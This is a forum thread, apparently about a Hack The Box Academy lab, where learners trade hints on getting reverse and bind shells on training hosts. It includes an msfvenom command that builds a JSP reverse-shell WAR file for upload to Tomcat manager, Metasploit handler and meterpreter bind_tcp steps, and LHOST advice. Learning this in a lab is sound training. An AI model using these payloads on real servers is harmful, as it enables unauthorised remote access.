Reverse Shell & Payloads - The live engagement

I think you used cat flag.txt; sometimes it will not work. Instead, use “type flag.txt”.

Could someone give me a nudge?

I’m on question 2 still, been a few days but mainly because I hate having to work inside this RDP environment.

I’m logged into the Tomcat manager with the creds provided and found on the desktop. I upload the WAR msfvenom payload, then start a listener with msfconsole, and then browse to the new directory added after uploading the WAR payload.

It just loads to the page where the payload is and does not actually connect back to my listener.

Here is what I’ve been using so far:

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=4434 -f war > test.war

and then

msfconsole > use/multi/handler > java/jsp_shell_reverse_tcp > Started reverse TCP handler on 
 > run and wait

Any tips or nudges would be greatly appreciated.

Hey, I’m stuck on the same spot. I can upload a webshell but am limited on commands. For example, I cannot run dir. I’ve tried the same reverse shell as you and have not had any luck. Have you figured it out?

I spent quite a lot of time with the last question (Host-03), turns out I didn’t read the instructions properly. For Host-03, the exploit is given in the hint, however, we need to set up both RHOSTS and LHOST. The clue for the LHOST is also given in the instructions.

Use it as the attacking machine. To open Firefox, open a terminal and type firefox.

Double-check your LHOST; try ifconfig.

The environment you are put in is painfully slow. I cannot see a reason for this. The content was easy but the environment is terrible.

vhost should be blog.inlanefreight.local
rhost should be the ip address of the blog machine

set payload php/meterpreter/bind_tcp

The Academy HTB material covers the difference between reverse and bind shells, but doesn’t emphasize the importance enough. Whenever you are trying to access a host that’s behind an internal network, you will have more success with bind shells than reverse shells, since it is too hard for that host to find its way back to you on the network. Meterpreter will automatically connect to the bind shell once it is established.

One more thing I just realized…you actually can use a reverse shell payload IF:

you use the IP address on the foothold host that is on the same internal network as the target hosts. Remember, one host can have multiple interfaces, each with its own IP address.

In the command line, type “ip addr” and look for an IP address that has the same subnet (172.16.1.X) as the target hosts, and use that IP address as your LHOST in Metasploit.
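The interface check described in the post above, as an added example that is not part of the original thread: it parses `ip -o -4 addr show` output and returns the local address that sits on the same subnet as a given peer, which is the only address that peer can reach without a route. The interface names and addresses in the sample are constructed assumptions, not lab values.

```python
import ipaddress
import re

# Constructed sample of `ip -o -4 addr show` output for a dual-homed host.
# Interface names and addresses are illustrative, not taken from the lab.
SAMPLE_IP_ADDR = """\
1: lo    inet 127.0.0.1/8 scope host lo\\       valid_lft forever preferred_lft forever
2: ens192    inet 10.129.0.50/16 brd 10.129.255.255 scope global ens192\\       valid_lft forever preferred_lft forever
3: ens224    inet 172.16.1.5/24 brd 172.16.1.255 scope global ens224\\       valid_lft forever preferred_lft forever
"""

# One record per line in -o (oneline) mode: "<index>: <ifname>    inet <addr>/<prefix> ..."
INET_RE = re.compile(r"^\d+:\s+(\S+)\s+inet\s+(\d+\.\d+\.\d+\.\d+/\d+)", re.M)


def parse_interfaces(text):
    """Return [(ifname, IPv4Interface)] for every IPv4 address in the output."""
    return [(name, ipaddress.ip_interface(cidr)) for name, cidr in INET_RE.findall(text)]


def on_link_addresses(text, peer):
    """Return [(ifname, local_ip)] whose subnet contains `peer`.

    An empty list means the peer is not directly connected: traffic from it
    to this host depends on routing, which an isolated internal segment
    usually does not provide.
    """
    peer_ip = ipaddress.ip_address(peer)
    return [
        (name, str(iface.ip))
        for name, iface in parse_interfaces(text)
        if not iface.ip.is_loopback and peer_ip in iface.network
    ]


if __name__ == "__main__":
    # 172.16.1.13 is a constructed peer address on the internal segment.
    for peer in ("172.16.1.13", "172.16.2.13"):
        print(peer, "->", on_link_addresses(SAMPLE_IP_ADDR, peer) or "not on-link")
```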

Hey, let me know if you are able to solve this. I am stuck with the same error.

Hey, have you figured out how to do this? I’m stuck like you and I’d like some help.

This RDP is so bad.
WTF, it keeps disconnecting, so slow, killing the fun. I was so hyped but I was surprised by this bad performance. I hated these last exercises.

Is there a way to find the credentials without reading the hint on the second host?


First thing I notice about your payload is the LHOST. It looks like you are using your Pwnbox IP; you need to use the IP of the RDP’d machine, mine was 172.x.x.x. Also, what helped me through this was a Google search: “Apache Tomcat Manager .war reverse shell | VK9 Security”.

Enter “firefox” without quotes in the terminal; it will start Firefox.

This is the most annoying challenge… The lab is so slow that at one point you just feel like slamming your PC to the ground… HackTheBox Academy, if you are reading this… PLEASE FOR GOD’S SAKE DON’T LET US RDP INTO SOME OTHER MACHINE TO SOLVE A GODDAMN CHALLENGE

Thanks for helping

How the heck did you solve the first section?

Did you guys solve it?